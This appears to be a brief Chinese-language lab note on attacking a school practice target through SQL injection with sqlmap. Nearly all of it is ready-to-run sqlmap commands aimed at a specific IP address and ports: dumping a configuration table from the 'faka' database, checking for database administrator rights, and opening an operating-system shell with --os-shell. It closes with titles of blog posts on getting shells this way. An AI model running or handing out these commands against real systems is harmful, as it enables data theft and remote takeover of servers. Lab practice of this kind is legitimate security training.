一、找到网站注入点然后进入sqlmap进行攻击(学校靶机)
sqlmap -u "http://117.167.136.244:28055/ajax.php?act=selgo" --data "tyid=1" -D faka -T ayangw_config --dump
二、输入sqlmap.py -u "http://117.167.136.244:28060/ajax.php?act=selKm" --data "gid=1" --is-dba
判断是否具有数据库管理员权限
确定具有后进行下一步操作
输入sqlmap.py -u "http://117.167.136.244:28032/ajax.php?act=selKm" --data "gid=1" --os-shell --batch
进入Linux界面
引入一些建立shell的博客
SQLMAP怎么拿shell
sqlmap --os-shell 解析